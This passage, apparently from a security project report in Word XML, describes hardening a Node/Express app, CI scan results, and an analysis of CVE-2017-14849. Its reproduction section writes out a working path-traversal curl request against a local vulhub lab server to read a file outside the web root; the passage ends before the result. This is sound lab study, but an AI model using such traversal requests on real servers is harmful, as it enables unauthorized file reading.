        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>JWT payload is merely base64, not encrypted.</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**Middleware verification.** `requireAuth` checks the `Bearer` scheme, verifies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the signature and the registered claims (`exp`, `iss`) with an **explicit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>algorithm allowlist** (this blocks the `alg: none` and algorithm-confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>attacks), and then reloads the user from the database so that a token for a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>deleted account stops working immediately.</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**Timing and enumeration.** The login route always runs a bcrypt comparison,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>even when the username does not exist, against a dummy hash. Without this, "no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>such user" would return noticeably faster than "wrong password" and leak which</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>accounts exist. The error message is the same for both cases.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**Online guessing.** Five failed attempts per username inside a 15-minute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>window produce `429 Too Many Requests`.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4.4 Other hardening</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Measure | Implementation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Security headers | `helmet()` — removes `X-Powered-By`, sets CSP, `X-Content-Type-Options`, frame options |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Body size limit | `express.json({ limit: '10kb' })` — blocks oversized-payload DoS |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| IDOR | notes are always queried with `owner_id = ?`, so another user's note returns 404, not 403 (no existence leak) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Error handling | a single handler returns generic JSON; stack traces and driver messages are never sent to the client |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Secrets | `JWT_SECRET` must come from the environment in production; the process exits if it is missing |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| SQL surface | no dynamic identifiers, no `ORDER BY` interpolation, no `eval`/`Function` |</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5. CI/CD pipeline and scan results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`.github/workflows/security-ci.yml` runs on **every push and every pull</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>request**: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Stage | Tool | Gate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Test | `npm test` (14 checks) | build fails on any failed check |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| **SAST** | ESLint 9 + `eslint-plugin-security` (14 rules) | build fails on any error |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| **SCA** | `npm audit` | build fails on high/critical in production dependencies |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Reports | `reports/sast-eslint.json`, `reports/sca-npm-audit.json` | uploaded as build artifacts |</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Current results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**SAST**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npx eslint src scripts --format stylish</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1 problem (0 errors, 1 warning)</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 one remaining warning, `security/detect-object-injection`, is a false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>positive: the object keys in `encodeForOutput()` come from our own column</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>names, not from the request. It is suppressed in place with a comment that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>explains why, which is preferable to switching the rule off globally.</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**SCA**</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npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>found 0 vulnerabilities</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Raw reports are in [`evidence/`](evidence/).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&gt; **Note on the registry.** `npm audit` needs the registry's advisory endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>&gt; It is executed against `registry.npmjs.org`; a mirror such as npmmirror does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>&gt; not implement `/-/npm/v1/security/advisories/bulk` and returns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>&gt; `[NOT_IMPLEMENTED]`.</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6. CVE analysis: CVE-2017-14849</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6.1 What the vulnerability is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CVE | **CVE-2017-14849** |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Affected | Node.js **8.5.0** only (8.5.0 ≤ version &lt; 8.6.0) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Class | CWE-22 — Improper Limitation of a Pathname to a Restricted Directory (path traversal) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Impact | Arbitrary file read outside the web root |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Fixed in | Node.js **8.6.0**, 2017 |</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Node.js 8.5.0 changed how `..` segments are handled inside `path.normalize()`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>The new implementation is wrong when a `..` appears *after* an ordinary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>segment in the middle of the path: it collapses too much of the prefix. Any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>framework that relies on `normalize()` to keep file access inside a directory —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>`express.static` via the `send` module is the textbook case — inherits the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>bug and starts serving files outside its root.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 vulnerable application in this repository is the vulhub scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(`node/CVE-2017-14849`): a stock Express 4.15.5 static file server.</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6.2 Reproduction</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Because Docker is not available on the machine where this work was produced,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the same application and the same runtime version were used natively instead of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>in a container. The result is identical: the vulnerable Node.js version is what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>matters, not the packaging.</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**Official path (Vulhub, requires Docker):**</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git clone https://github.com/vulhub/vulhub.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>cd vulhub/node/CVE-2017-14849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>docker compose build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>docker compose up -d          # http://localhost:3000</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**Path actually executed here:**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 1. application taken from vulhub (www/app.js, express 4.15.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>cd cve/CVE-2017-14849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm install                    # express 4.15.5</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2. official Node.js 8.5.0 runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl -L --ssl-no-revoke -o node8.zip \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  https://registry.npmmirror.com/-/binary/node/v8.5.0/node-v8.5.0-win-x64.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>tar -xf node8.zip -C C:\n850</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3. start the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>C:\n850\node-v8.5.0-win-x64\node.exe www/app.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># Example app listening on port 3000!</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4. baseline: the static asset is served normally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl --path-as-is -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://127.0.0.1:3000/static/main.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># 200</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5. the attack -- read a file that lives OUTSIDE www/static</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl --path-as-is -s -i \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  'http://127.0.0.1:3000/static/../foo/../../secret.txt'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**Result:**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```http</w:t>
